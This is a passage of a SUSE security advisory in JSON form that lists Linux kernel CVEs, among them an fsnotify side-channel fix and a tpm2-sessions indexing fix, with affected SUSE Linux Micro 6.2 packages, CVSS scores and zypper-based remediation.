"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68784"
},
{
"cve": "CVE-2025-68788",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68788"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfsnotify: do not generate ACCESS/MODIFY events on child for special files\n\ninotify/fanotify do not allow users with no read access to a file to\nsubscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the\nsame user to subscribe for watching events on children when the user\nhas access to the parent directory (e.g. /dev).\n\nUsers with no read access to a file but with read access to its parent\ndirectory can still stat the file and see if it was accessed/modified\nvia atime/mtime change.\n\nThe same is not true for special files (e.g. /dev/null). Users will not\ngenerally observe atime/mtime changes when other users read/write to\nspecial files, only when someone sets atime/mtime via utimensat().\n\nAlign fsnotify events with this stat behavior and do not generate\nACCESS/MODIFY events to parent watchers on read/write of special files.\nThe events are still generated to parent watchers on utimensat(). This\ncloses some side-channels that could be possibly used for information\nexfiltration [1].\n\n[1] https://snee.la/pdf/pubs/file-notification-attacks.pdf",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68788",
"url": "https://www.suse.com/security/cve/CVE-2025-68788"
},
{
"category": "external",
"summary": "SUSE Bug 1256638 for CVE-2025-68788",
"url": "https://bugzilla.suse.com/1256638"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68788"
},
{
"cve": "CVE-2025-68789",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68789"
}
],
"notes": [
{
"category": "general",
"text": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68789",
"url": "https://www.suse.com/security/cve/CVE-2025-68789"
},
{
"category": "external",
"summary": "SUSE Bug 1256781 for CVE-2025-68789",
"url": "https://bugzilla.suse.com/1256781"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68789"
},
{
"cve": "CVE-2025-68792",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68792"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm2-sessions: Fix out of range indexing in name_size\n\n\u0027name_size\u0027 does not have any range checks, and it just directly indexes\nwith TPM_ALG_ID, which could lead into memory corruption at worst.\n\nAddress the issue by only processing known values and returning -EINVAL for\nunrecognized values.\n\nMake also \u0027tpm_buf_append_name\u0027 and \u0027tpm_buf_fill_hmac_session\u0027 fallible so\nthat errors are detected before causing any spurious TPM traffic.\n\nEnd also the authorization session on failure in both of the functions, as\nthe session state would be then by definition corrupted.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68792",
"url": "https://www.suse.com/security/cve/CVE-2025-68792"
},
{
"category": "external",
"summary": "SUSE Bug 1256656 for CVE-2025-68792",
"url": "https://bugzilla.suse.com/1256656"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
